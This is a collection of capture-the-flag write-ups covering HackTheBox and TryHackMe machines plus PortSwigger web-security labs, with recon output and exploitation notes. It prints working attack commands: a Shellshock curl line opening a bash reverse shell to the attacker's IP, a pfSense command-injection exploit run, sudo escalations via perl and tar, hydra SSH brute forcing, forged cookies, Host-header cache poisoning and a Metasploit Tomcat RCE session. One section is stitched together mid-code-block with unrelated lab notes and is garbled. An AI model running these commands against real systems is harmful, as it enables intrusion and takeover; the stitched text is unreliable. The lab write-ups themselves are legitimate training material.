/HackTheBox/EZ/sense.md:
--------------------------------------------------------------------------------
# recon
- nmap
```
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://sense.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
```
- Linux-like OS -> ping TTL
- http://sense.htb gives me an error ->
```
Potential DNS Rebind attack detected, see http://en.wikipedia.org/wiki/DNS_rebinding
Try accessing the router by IP address instead of by hostname.
```
- 200 with a login page when accessing the web page by IP address
- /index.php: pfSense login page
- default admin credentials didn't work, see [link](https://pfsense-docs.readthedocs.io/en/latest/usermanager/pfsense-default-username-and-password.html)
- /index.html: DragonFly BSD

## gobuster
I used two wordlists this time. The first run with big.txt did not give any good hits; I then tried the lowercase medium list and got good hints from two .txt files.
```console
$ gobuster dir -u https://10.10.10.60/ -x txt,php,html -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 54 -k

/classes (Status: 301)
/css (Status: 301)
/edit.php (Status: 200)
/exec.php (Status: 200)
/favicon.ico (Status: 200)
/graph.php (Status: 200)
/help.php (Status: 200)
/includes (Status: 301)
/index.php (Status: 200)
/index.html (Status: 200)
/installer (Status: 301)
/interfaces.php (Status: 200)
/javascript (Status: 301)
/license.php (Status: 200)
/pkg.php (Status: 200)
/stats.php (Status: 200)
/status.php (Status: 200)
/system.php (Status: 200)
/themes (Status: 301)
/tree (Status: 301)
/widgets (Status: 301)
/wizards (Status: 301)
/wizard.php (Status: 200)
/xmlrpc.php (Status: 200)
/~sys~ (Status: 403)
/changelog.txt
/system-users.txt
```
- /changelog.txt
```
# Security Changelog

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window
```
Okay, so 1 vulnerability still exists.

- /system-users.txt
```
####Support ticket###

Please create the following user


username: Rohit
password: company defaults
```
So we got the credentials... but the password? "company defaults"??? I guess it is the default password for pfSense, which we found in the link above. Now try to log in with **rohit:pfsense**.


Boom, we are in!
- systeminfo
```
2.1.3-RELEASE (amd64)
built on Thu May 01 15:52:13 EDT 2014
FreeBSD 8.3-RELEASE-p16
```
As we already know from `/changelog.txt`, there is a serious vuln on the firewall which is not patched yet, so let's google and find out.


After some googling I found an exploit for this version: [link](https://www.exploit-db.com/exploits/43560). So let's use searchsploit to get the exploit script and launch our attack.
```
kali@kali:~/HTB/sense$ searchsploit pfSense 2.1.4
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py
--------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
kali@kali:~/HTB/sense$ searchsploit -m php/webapps/43560.py
  Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
      URL: https://www.exploit-db.com/exploits/43560
     Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/kali/HTB/sense/43560.py
```
let's check the exploit script
```
kali@kali:~/HTB/sense$ python3 43560.py -h
usage: 43560.py [-h] [--rhost RHOST] [--lhost LHOST] [--lport LPORT] [--username USERNAME]
                [--password PASSWORD]

optional arguments:
  -h, --help           show this help message and exit
  --rhost RHOST        Remote Host
  --lhost LHOST        Local Host listener
  --lport LPORT        Local Port listener
  --username USERNAME  pfsense Username
  --password PASSWORD  pfsense Password
```
okay, let's run it
```
kali@kali:~/HTB/sense$ python3 43560.py --rhost 10.10.10.60 --lhost tun0 --lport 6969 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
```
Boom, we got a shell....... AS ROOT!!!


Go grab the flags, GLHF
--------------------------------------------------------------------------------
/HackTheBox/EZ/shocky.md:
--------------------------------------------------------------------------------
# recon
- 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  2222 -> rabbit hole...

## gobuster
- /
```
/cgi-bin/ (Status: 403)
/cgi-bin/.html (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
```
- /cgi-bin/: since it is Linux, look for .sh
```
user.sh
```
A GET on `/cgi-bin/user.sh` returns:
```

Content-Type: text/plain

Just an uptime test script

 10:15:49 up  1:05,  0 users,  load average: 0.00, 0.00, 0.00
```
Shocker??? -> Shellshock.

Looking at this:
- https://github.com/s4n7h0/NSE/blob/master/http-shellshock.nse
- https://book.hacktricks.xyz/pentesting/pentesting-web/cgi#shellshock

Try it out.
```
kali@kali:~/HTB/shocker$ curl -H 'User-Agent: () { :; }; echo; echo "VULNERABLE TO SHELLSHOCK"' http://shocker.htb/cgi-bin/user.sh 2>/dev/null
VULNERABLE TO SHELLSHOCK

Content-Type: text/plain

Just an uptime test script

 10:15:49 up  1:05,  0 users,  load average: 0.00, 0.00, 0.00
```

# foot hold

The victim server is vulnerable to Shellshock, so let's try to craft a bash reverse shell:

```
kali@kali:~/HTB/shocker$ curl -H 'User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/10.10.14.8/6969 0>&1' http://shocker.htb/cgi-bin/user.sh 2>/dev/null
```
nc listening on port 6969:
```
kali@kali:~/HTB/shocker$ nc -nlvp 6969
listening on [any] 6969 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.56] 33820
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$
```
go grab the user flag

# root

run `linpeas.sh`
```
[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
```

**GTFOBins**: `sudo perl -e 'exec "/bin/bash";'`

```
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
root@Shocker:/home/shelly# whoami
whoami
root
```
go grab the root flag.
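For the defender's side of the Shellshock probe above, here is an added example (not from the original write-up) that scans Apache `combined` access-log lines for the bash function-definition marker in the Referer and User-Agent fields, the two request headers that format records. The log lines are constructed for the example; the second mirrors the harmless `echo` probe used above and the third shows a whitespace variant of the marker.

```python
"""Flag Shellshock (CVE-2014-6271) probes in Apache 'combined' access logs.

Added example, not part of the original write-up. A Shellshock payload rides
in any header the CGI wrapper exports as an environment variable; of those,
the combined log format records Referer and User-Agent, so those two are what
can be inspected after the fact. The marker is a bash function definition of
the form `() {` at the start of the header value.
"""
import re
from typing import Dict, List, Optional

# A double-quoted log field: Apache escapes embedded quotes as \", so allow
# either a non-quote/non-backslash character or a backslash escape.
_QUOTED = r'(?:[^"\\]|\\.)*'

# Apache "combined" format:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    + r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) \S+ '
    + r'"(?P<referer>' + _QUOTED + r')" "(?P<agent>' + _QUOTED + r')"$'
)

# Bash function-definition prefix, tolerant of whitespace variants:
# "() {", "(){", "( ) {".
SHELLSHOCK_RE = re.compile(r'^\s*\(\s*\)\s*\{')


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into its fields, or None if it does not match."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_shellshock_value(value: str) -> bool:
    """True if a header value begins with the bash function-definition marker."""
    return SHELLSHOCK_RE.match(value) is not None


def find_shellshock(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per header (Referer or User-Agent) carrying the marker.

    Each record has ip, path (taken from the request line), field and value.
    Lines that do not parse are skipped rather than raising, so one malformed
    line does not abort a scan over a large log.
    """
    hits = []
    for line in lines:
        fields = parse_combined(line)
        if fields is None:
            continue
        parts = fields["request"].split(" ")
        path = parts[1] if len(parts) >= 2 else fields["request"]
        for name in ("referer", "agent"):
            if is_shellshock_value(fields[name]):
                hits.append({"ip": fields["ip"], "path": path,
                             "field": name, "value": fields[name]})
    return hits


# Constructed sample log lines (not taken from the box). The second mirrors the
# harmless probe used in the write-up; the third is a whitespace variant.
SAMPLE_LOG = [
    '10.10.14.8 - - [02/Oct/2020:10:15:49 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.72.0"',
    '10.10.14.8 - - [02/Oct/2020:10:16:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 146 "-" "() { :; }; echo; echo \\"VULNERABLE TO SHELLSHOCK\\""',
    '10.10.14.8 - - [02/Oct/2020:10:16:30 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "( ) {:;}; echo" "Mozilla/5.0"',
    '10.10.14.9 - - [02/Oct/2020:10:17:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]} {hit["field"]}: {hit["value"]}')
```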
--------------------------------------------------------------------------------
/HackTheBox/EZ/swagshop.md:
--------------------------------------------------------------------------------
# recon
## nmap
- 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

## 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- gobuster
```
/app (Status: 301)
/api.php (Status: 200)
/cron.php (Status: 200)
/errors (Status: 301)
/favicon.ico (Status: 200)
/includes (Status: 301)
/index.php (Status: 200)
/install.php (Status: 200)
/js (Status: 301)
/lib (Status: 301)
/media (Status: 301)
/pkginfo (Status: 301)
/server-status (Status: 403)
/shell (Status: 301)
/skin (Status: 301)
/var (Status: 301)
```
- about us
```
To all of you, from all of us at Magento Store - Thank you and Happy eCommerce!

John Doe
Some important guy
```
- /js/ : `SYNTAX: index.php/x.js?f=dir1/file1.js,dir2/file2.js`
- /install.php : `FAILED ERROR: Magento is already installed `
- /shell
```
[ ] abstract.php  2014-05-07 14:58  5.5K
[ ] compiler.php  2014-05-07 14:58  4.3K
[ ] indexer.php   2014-05-07 14:58  8.0K
[ ] log.php       2014-05-07 14:58  5.8K
```
- /errors
```
[ ]   404.php           2014-05-07 14:58  1.0K
[ ]   503.php           2014-05-07 14:58  1.0K
[DIR] default/          2014-05-07 14:58  -
[ ]   design.xml        2014-05-07 14:58  1.0K
[ ]   local.xml.sample  2014-05-07 14:58  1.6K
[ ]   processor.php     2014-05-07 14:58  16K
[ ]   report.php        2014-05-07 14:58  1.1K
```
- /includes/ : config.php
- **/lib/Magento/Db/Sql**
- /index.php/admin : admin page

## foot hold
from searchsploit I found an interesting exploit: `Magento eCommerce - Remote Code Execution`.
run `searchsploit -x
```

```
POST /forgot-password HTTP/1.1
Host: ac051fe31fa115bd809f1db800380059.web-security-academy.net:'click here to login with your new password: pUFVxOIq1g

Thanks,
Support team

This email has been scanned by the MacCarthy Email Security service
```

no way, I logged into the server as carlos but wasn't done taking notes and doing more experiments.... can we redo the lab?

# web cache poisoning
I read the guideline on PortSwigger. It is not too hard to understand how it works, but I learn more when I listen, so I watched a bit of YouTube on how web cache poisoning works. I couldn't make the extension work, so I just tried adding different headers and ended up with `HOST`
```
GET / HTTP/1.1
Host: ac971f5a1fb39ab7807d059500930022.web-security-academy.net
Host: kuro.net
```
and it seems like it works. line 19 in the http response
```html
```
` but it didn't work. it ended up like this
```html

/resources/js/tracking.js">

```
and ofc it didn't work, we even messed up the web page. So I was thinking: what if I create a server which serves `kurohat.net/resources/js/tracking.js` with the content `alert(document.cookie)`? Then it should work, since the web page will load my malicious script from `kurohat.net/resources/js/tracking.js`


Instead of using our own website, we can use the exploit server that the lab offers instead. create a page `/resources/js/tracking.js` with content `alert(document.cookie)` then click *store*. now copy the link and insert it as our 2nd `host` header. Use repeater to send our request until you get a response with `Age: 0`. Try to visit the page; if you get an alert then we are good!!


# Host header authentication bypass
```
This lab makes an assumption about the privilege level of the user based on the HTTP Host header.

To solve the lab, access the admin panel and delete Carlos's account.
```
I assumed that the admin page is at `/admin` and luckily I got it right! I sent it to *Repeater* and tried adding headers like `X-Forwarded-For` / `X-Forwarded-Host: localhost`, but it didn't work.
I then just removed the original `Host` header and replaced it with localhost and boom, it works!! Now open it in the web browser and click delete Carlos's account -> send it to *Burp* and again replace the original host with localhost

# Routing-based SSRF
```
This lab is vulnerable to routing-based SSRF via the Host header. You can exploit this to access an insecure intranet admin panel located on an internal IP address.

To solve the lab, access the internal admin panel located in the 192.168.0.0/24 range, then delete Carlos
```
to create the payload, run
```zsh
$ python3 -c "for i in range (0,256): print(i);" > subnet.txt
```
I tried, but you need Burp PRO (Burp Collaborator) to solve this!

# SSRF via flawed request parsing
Also needs Burp PRO (Burp Collaborator)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# write up
Just my write ups for CTF
--------------------------------------------------------------------------------
/TryHackMe/Bounty-hacker.md:
--------------------------------------------------------------------------------
# recon
nmap shows us that there are 3 open ports
- 21/tcp open ftp
  - ftp-anon: Anonymous FTP login allowed (FTP code 230)
- 22/tcp open ssh
- 80/tcp open http
  - Apache/2.4.18 (Ubuntu)

let's run gobuster for directory brute forcing.
```
$ gobuster dir -u http://$IP/ -w /usr/share/SecLists/Discovery/Web-Content/big.txt -x .php,.txt,.html -t 54
```
while we wait for the gobuster result we can examine the FTP port. Note that the FTP port is open for `Anonymous` login. what does that mean? yes, we can log in to FTP using `Anonymous` as the username, and no password is needed!
```
$ ftp $IP
```
use `ls` to list the files on the ftp. There are 2 files here.
To get a file, run: `get `. Get both files onto our kali so we can examine them.

as mentioned there are 2 files:
1. locks.txt: this file looks like a password list/wordlist. We might be able to use it for brute forcing
2. task.txt: a to-do list written by *lin*

What we have at this point is username=`lin` and passwords in `locks.txt`. Now you can forget about gobuster... we already got something really juicy here. Let's get a foothold on the victim server.

# foothold
now let's brute force ssh to get a foothold on the victim server. We will use hydra to perform the ssh brute forcing. If you don't know how hydra works, there is a really good room on tryhackme that teaches you how to use hydra, so pls check it out
```console
$ hydra -f -l lin -P locks.txt $IP -t 64 ssh
```
Boom! we got the password. now ssh to the victim server and go grab the user flag.

# root
we will start by checking what lin is allowed to run as super user by running `sudo -l`.
```console
lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
```
As you see, we are allowed to run `tar` as root. When you see this, the first thing to do is visit `GTFObins` ([link](https://gtfobins.github.io/)) and search for tar (link [here](https://gtfobins.github.io/gtfobins/tar/)). you can go script kiddez style and copy and paste the code under `#sudo` to gain root, or read more about how it works by doing more research about it.

anyhow, here is what we do.
```console
lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
# cat /root/root.txt
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber/day16.py:
--------------------------------------------------------------------------------
```python
# Day File Confusion, create by gu2rks
import sys
import os
import zipfile
import exiftool


def task1():
    """
    How many files did you extract (excluding all the .zip files)?
    """
    # get all the zip files
    files = os.listdir('./final-final-compressed')
    for file in files:
        # unzip each one into ./extracted
        with zipfile.ZipFile('./final-final-compressed/' + file, 'r') as zip_ref:
            zip_ref.extractall('./extracted')
    # count what came out
    extracted = os.listdir('./extracted')
    print('Extracted %s files' % len(extracted))


def task2():
    """
    How many files contain Version: 1.1 in their metadata?
    Note: move this script inside ./extracted
    lookingfor = {'SourceFile': '4jGg.txt', 'ExifTool:ExifToolVersion': 11.94, 'File:FileName': '4jGg.txt',
                  'File:Directory': '.', 'File:FileSize': 2844, 'File:FileModifyDate': '2020:05:13 22:02:50-04:00',
                  'File:FileAccessDate': '2020:05:13 22:39:53-04:00', 'File:FileInodeChangeDate': '2020:05:13 22:02:50-04:00',
                  'File:FilePermissions': 644, 'File:FileType': 'MIE', 'File:FileTypeExtension': 'MIE', 'File:MIMEType': 'application/x-mie',
                  'XMP:XMPToolkit': 'Image::ExifTool 10.80', 'XMP:Version': 1.1}
    """
    count = 0
    files = os.listdir('./')  # get all files

    with exiftool.ExifTool() as et:  # one exiftool process for the whole batch
        files_metadata = et.get_metadata_batch(files)  # metadata for all files at once
        for metadata in files_metadata:  # one dict per file
            # the question asks for Version 1.1 specifically, so compare the value
            # (exiftool hands it back as the number 1.1), not just the key's presence
            if str(metadata.get('XMP:Version')) == '1.1':
                count = count + 1

    print('Total Version:1.1 files : %s' % count)


def task3():
    """
    Which file contains the password?
    Note: move this script inside ./extracted
    password is 'scriptingpass'
    """
    files = os.listdir('./')  # get all files
    for file in files:  # go through them one by one
        with open(file, 'r', encoding="ISO-8859-1") as reader:  # open it
            data = reader.read()  # read it
            if 'password' in data:  # check if it contains the word password
                print(file)  # if so -> print out the file name


if __name__ == '__main__':
    # pick the task from the command line, e.g. `python3 day16.py 2`
    tasks = {'1': task1, '2': task2, '3': task3}
    if len(sys.argv) != 2 or sys.argv[1] not in tasks:
        sys.exit('usage: python3 day16.py <1|2|3>')
    tasks[sys.argv[1]]()
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber/files.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurohat/writeUp/438003d46e13c27bcafb4136b75344c2af39f762/TryHackMe/Easy/AdventOfCyber/files.zip
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber/final-final-compressed.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurohat/writeUp/438003d46e13c27bcafb4136b75344c2af39f762/TryHackMe/Easy/AdventOfCyber/final-final-compressed.zip
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber/getflag.py:
--------------------------------------------------------------------------------
```python
# made by gu2rks@github
import requests

BASE = "http://10.10.169.100:3000"

# the first response looks like {"value":"s","next":"f"}: one flag character
# plus the path of the next one, so follow the chain until "next" is "end"
r = requests.get(BASE, timeout=10).json()
flag = r["value"]
while True:
    r = requests.get(BASE + "/" + str(r["next"]), timeout=10).json()
    if r["next"] == "end":
        break
    flag = flag + r["value"]

print("the flag: " + flag)
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day1.md:
--------------------------------------------------------------------------------
- linux server (from ping TTL)
- password length > 5,
- running php.
  I found out by requesting `index.php` -> returns 200. index.html -> returns 440

I created an account `kurohat:12345`. There is not much to see/do on the main page, only a logout button. I then checked dev tools -> cookies
```
auth:7b22636f6d70616e79223a22546865204265737420466573746976616c20436f6d70616e79222c2022757365726e616d65223a226b75726f686174227d
```
I assumed that it is a hex/base64 encoded string. let's use CyberChef to understand what the string represents! It turns out that it is hex. This is the result when I convert it to UTF-8
```
{"company":"The Best Festival Company", "username":"kurohat"}
```
the plan is to change the username to santa (`{"company":"The Best Festival Company", "username":"santa"}`). Convert it into hex using CyberChef, which will give us
```
7b22636f6d70616e79223a22546865204265737420466573746976616c20436f6d70616e79222c2022757365726e616d65223a2273616e7461227d
```
now remove your cookie value and replace it with Santa's cookie -> hit F5 (refresh). BOOM! we are in as Santa

Activate each control to get the flags

# etc
- SatNav = Satellite navigation
- never use poor cookies!!!
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day10.md:
--------------------------------------------------------------------------------
start off with nmap.
```
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
```
let's use enum4linux to enumerate smb, starting with the share list
```console
$ /usr/share/enum4linux/enum4linux.pl -S 10.10.223.29

 =========================================
|    Share Enumeration on 10.10.223.29    |
 =========================================

        Sharename       Type      Comment
        ---------       ----      -------
        tbfc-hr         Disk      tbfc-hr
        tbfc-it         Disk      tbfc-it
        tbfc-santa      Disk      tbfc-santa
        IPC$            IPC       IPC Service (tbfc-smb server (Samba, Ubuntu))
```
now let's enumerate users
```console
$ /usr/share/enum4linux/enum4linux.pl -U 10.10.223.29
 =============================
|    Users on 10.10.223.29    |
 =============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy      Name:   Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager      Name: elfmceager        Desc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson   Name:   Desc:
```
let's use nmap (pymap) to enumerate smb and each share, to check if any of them allow anonymous login
```console
$ sudo /opt/pymap.py -t 10.10.223.29 -smb
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.223.29\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (tbfc-smb server (Samba, Ubuntu))
|     Users: 1
|     Max Users:
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.223.29\tbfc-hr:
|     Type: STYPE_DISKTREE
|     Comment: tbfc-hr
|     Users: 0
|     Max Users:
|     Path: C:\shares\tbfc-hr
|     Anonymous access:
|     Current user access:
|   \\10.10.223.29\tbfc-it:
|     Type: STYPE_DISKTREE
|     Comment: tbfc-it
|     Users: 0
|     Max Users:
|     Path: C:\shares\tbfc-hr
|     Anonymous access:
|     Current user access:
|   \\10.10.223.29\tbfc-santa:
|     Type: STYPE_DISKTREE
|     Comment: tbfc-santa
|     Users: 0
|     Max Users:
|     Path: C:\shares\tbfc-santa
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
```
as you can see, `tbfc-santa` has Anonymous READ/WRITE permission. connect to the share using `smbclient`; no need to enter a password since it allows anonymous login
```console
$ smbclient \\\\10.10.223.29\\tbfc-santa
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day11.md:
--------------------------------------------------------------------------------
ssh to the server using `cmnatic:aoc2020`. I will use `suid3num.py` to enumerate SUID binaries. I start by checking if the target server has wget and python3 pre-installed: python3 is used to execute `suid3num.py` and wget is used to fetch `suid3num.py` from our kali
```console
-bash-4.4$ which python3
/usr/bin/python3
-bash-4.4$ which wget
/usr/bin/wget
```
now on kali, run the python http server module
```console
$ python3 -m http.server --cgi 8888
```
on the target server, use wget to download `suid3num.py` and run it
```console
-bash-4.4$ python3 suid3num.py
[#] SUID Binaries in GTFO bins list (Hell Yeah!)
------------------------------
/bin/bash -~> https://gtfobins.github.io/gtfobins/bash/#suid
------------------------------


[$] Please try the command(s) below to exploit harmless SUID bin(s) found !!!
------------------------------
[~] /bin/bash -p
------------------------------
```
now run `/bin/bash -p` to gain root
```console
-bash-4.4$ /bin/bash -p
bash-4.4# whoami
root
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day12.md:
--------------------------------------------------------------------------------
- port scanning
```
[+] Port scanning...
3389/tcp open  ms-wbt-server
8009/tcp open  ajp13
8080/tcp open  http-proxy
[+] Enumerating open ports...

PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS


PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat 9.0.17
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.17


PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: TBFC-WEB-01
|   NetBIOS_Domain_Name: TBFC-WEB-01
|   NetBIOS_Computer_Name: TBFC-WEB-01
|   DNS_Domain_Name: tbfc-web-01
|   DNS_Computer_Name: tbfc-web-01
|   Product_Version: 10.0.17763
|_  System_Time: 2020-12-12T18:34:26+00:00
| ssl-cert: Subject: commonName=tbfc-web-01
| Not valid before: 2020-11-27T01:29:04
|_Not valid after:  2021-05-29T01:29:04
|_ssl-date: 2020-12-12T18:34:27+00:00; +1s from scanner time.
```
- cve https://www.trendmicro.com/en_us/research/19/d/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat.html
- http://:8080/cgi-bin/elfwhacker.bat
```console
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > set targeturi /cgi-bin/elfwhacker.bat
targeturi => /cgi-bin/elfwhacker.bat
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run

[*] Started reverse TCP handler on 10.8.14.151:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (176195 bytes) to 10.10.35.81
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 1 opened (10.8.14.151:4444 -> 10.10.35.81:49827) at 2020-12-12 13:47:58 -0500
```
grab flag
```
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > set showdescription true
showdescription => true
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.35.81 - Collecting local exploits for x86/windows...
[*] 10.10.35.81 - 34 exploit checks are being tried...
[+] 10.10.35.81 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
  This module exploits CVE-2020-0787, an arbitrary file move
  vulnerability in outdated versions of the Background Intelligent
  Transfer Service (BITS), to overwrite
  C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL
  containing the attacker's payload. To achieve code execution as the
  SYSTEM user, the Update Session Orchestrator service is then
  started, which will result in the malicious
  WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a
  DLL hijacking issue within the Update Session Orchestrator Service.
  Note that presently this module only works on Windows 10 and Windows
  Server 2016 and later as the Update Session Orchestrator Service was
  only introduced in Windows 10. Note that only Windows 10 has been
  tested, so your mileage may vary on Windows Server 2016 and later.
[+] 10.10.35.81 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
  This module exploits a missing DLL loaded by the 'IKE and AuthIP
  Keyring Modules' (IKEEXT) service which runs as SYSTEM, and starts
  automatically in default installations of Vista-Win8. It requires an
  insecure bin path to plant the DLL payload.
[+] 10.10.35.81 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
  Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to
  achieve a SYSTEM handle for elevation of privilege. Currently the
  module does not spawn as SYSTEM, however once achieving a shell, one
  can easily use incognito to impersonate the token.
[*] Post module execution completed
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/AdventOfCyber2/Day13.md:
--------------------------------------------------------------------------------
use nmap to scan the server, you will see port 23 TELNET is open. let's connect to it
```console
$ telnet $IP
Trying 10.10.145.194...
Connected to 10.10.145.194.
Escape character is '^]'.
HI SANTA!!!

We knew you were coming and we wanted to make
it easy to drop off presents, so we created
an account for you to use.

Username: santa
Password: clauschristmas

We left you cookies and milk!

christmas login: santa
Password:
Last login: Sat Nov 21 20:37:37 UTC 2020 from 10.0.2.2 on pts/2
            \ /
          -->*<--
            /o\
           /_\_\
          /_/_0_\
         /_o_\_\_\
        /_/_/_/_/o\
       /@\_\_\@\_\_\
      /_/_/O/_/_/_/_\
     /_\_\_\_\_\o\_\_\
    /_/0/_/_/_0_/_/@/_\
   /_\_\_\_\_\_\_\_\_\_\
  /_/o/_/_/@/_/_/o/_/0/_\
           [___]
```

I love John's Xmas tree <3
```bash
$ cat christmas.sh
#!/bin/bash
trap "tput reset; tput cnorm; exit" 2
clear
tput civis
lin=2
col=$(($(tput cols) / 2))
c=$((col-1))
est=$((c-2))
color=0
tput setaf 2; tput bold

# Tree
for ((i=1; i<20; i+=2))
{
    tput cup $lin $col
    for ((j=1; j<=i; j++))
    {
        echo -n \*
    }
    let lin++
    let col--
}

tput sgr0; tput setaf 3

# Trunk
for ((i=1; i<=2; i++))
{
    tput cup $((lin++)) $c
    echo "mWm"
}
new_year=$(date +"%Y")
let new_year++
tput setaf 1; tput bold
tput cup $lin $((c - 6)); echo " TryHackMe"
tput cup $((lin + 1)) $((c - 10)); echo " Advent of Cyber with John Hammond"
let c++
k=1

# Lights and decorations
while true; do
    for ((i=1; i<=35; i++)) {
        # Turn off the lights
        [ $k -gt 1 ] && {
            tput setaf 2; tput bold
            tput cup ${line[$[k-1]$i]} ${column[$[k-1]$i]}; echo \*
            unset line[$[k-1]$i]; unset column[$[k-1]$i]  # Array cleanup
        }

        li=$((RANDOM % 9 + 3))
        start=$((c-li+2))
